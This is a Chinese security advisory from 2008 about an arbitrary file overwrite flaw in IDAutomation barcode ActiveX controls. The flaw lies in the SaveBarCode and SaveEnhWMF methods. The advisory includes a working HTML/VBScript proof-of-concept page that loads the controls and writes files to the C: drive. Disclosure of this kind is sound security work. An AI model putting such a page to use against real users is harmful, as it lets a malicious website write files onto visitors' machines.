安全研究
安全漏洞
IDAutomation多个条码ActiveX控件任意文件覆盖漏洞
发布日期:2008-05-14
更新日期:2008-05-16
受影响系统:
ID Automation Linear Barcode 1.6.0.6描述:
ID Automation PDF417 Barcode 1.6.0.6
ID Automation Aztec Barcode 1.7.1.0
ID Automation Datamatrix Barcode 1.6.0.6
BUGTRAQ ID: 29204
IDAutomation是美国一家专注于自动识别、条形码技术的公司,IDAutomation的产品包括条形码编辑、识别、打印、扫描功能的字体包、软件、控件产品等。
IDAutomation带的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞在用户系统上写入任意文件。
IDAutomation所提供的以下条码ActiveX控件:
* IDAuto.BarCode.1(IDAutomationLinear6.dll)
* IDAuto.Datamatrix.1(IDAutomationDMATRIX6.DLL)
* IDAuto.PDF417.1(IDAutomationPDF417_6.dll)
* IDAuto.Aztec.1(IDAutomationAZTEC.dll)
没有安全地调用SaveBarCode()和SaveEnhWMF()方式:
Sub SaveBarCode (
ByVal path As String
)
Sub SaveEnhWMF (
ByVal path As String
)
上述方式没有检查传送给path参数的输入便在ActiveX控件中使用,如果用户受骗访问了恶意网页的话就可能导致向用户机器上写入任意文件。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/30246/
http://www.shinnai.altervista.org/index.php?mod=02_Forum&group=Security&argument=Remote_performed_exploits&topic=1210750552.ff.php&page=last
http://marc.info/?l=bugtraq&m=127713360616912&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<b>IDAutomation Linear BarCode:</b> <object classid='clsid:0C3874AA-AB39-4B5E-A768-45F3CE6C6819' id='IDLinear'></object>
<b>IDautomation Datamatrix Barcode:</b> <object classid='clsid:DB67DB99-616A-4CAB-A3A1-2EF644F254E7' id='IDDataMatrix'></object>
<b>IDautomation PDF417 Barcode:</b> <object classid='clsid:E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0' id='IDPDF'></object>
<b>IDautomation Aztec Barcode:</b> <object classid='clsid:eba15b30-80b4-11dc-b31d-0050c2490048' id='IDAztec'></object>
-----------------------------------------------------------------------------
<select style="width: 404px" name="IDAuto">
<option value = "IDLinearOpt">IDAutomation Linear BarCode</option>
<option value = "IDDataMatrixOpt">IDautomation Datamatrix Barcode</option>
<option value = "IDPDFOpt">IDautomation PDF417 Barcode</option>
<option value = "IDAztecOpt">IDautomation Aztec Barcode</option>
</select>
<select style="width: 404px" name="IDMethods">
<option value = "SaveBarCode">SaveBarCode</option>
<option value = "SaveEnhWMF">SaveEnhWMF</option>
</select>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
On Error Resume Next
If IDAuto.value="IDLinearOpt" And IDMethods.Value = "SaveBarCode" Then
IDLinear.SaveBarCode "C:\IDLinearSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDLinearOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDLinear.SaveBarCode "C:\IDLinearSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDDataMatrixOpt" And IDMethods.Value = "SaveBarCode" Then
IDDataMatrix.SaveBarCode "C:\IDDataMatrixSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDDataMatrixOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDDataMatrix.SaveBarCode "C:\IDDataMatrixSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDPDFOpt" And IDMethods.Value = "SaveBarCode" Then
IDPDF.SaveBarCode "C:\IDPDFSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDPDFOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDPDF.SaveEnhWMF "C:\IDPDFSaveEnhWMF.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDAztecOpt" And IDMethods.Value = "SaveBarCode" Then
IDAztec.SaveBarCode "C:\IDAztecSaveBarCode.txt"
MsgBox "Exploit completed!"
ElseIf IDAuto.value="IDAztecOpt" And IDMethods.Value = "SaveEnhWMF" Then
IDAztec.SaveEnhWMF "C:\IDAztecSaveEnhWMF.txt"
MsgBox "Exploit completed!"
Else
MsgBox "Be safe..."
End if
End Sub
</script>
建议:
厂商补丁:
ID Automation
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://idautomation.com/
浏览次数:2776
严重程度:0(网友投票)
绿盟科技给您安全的保障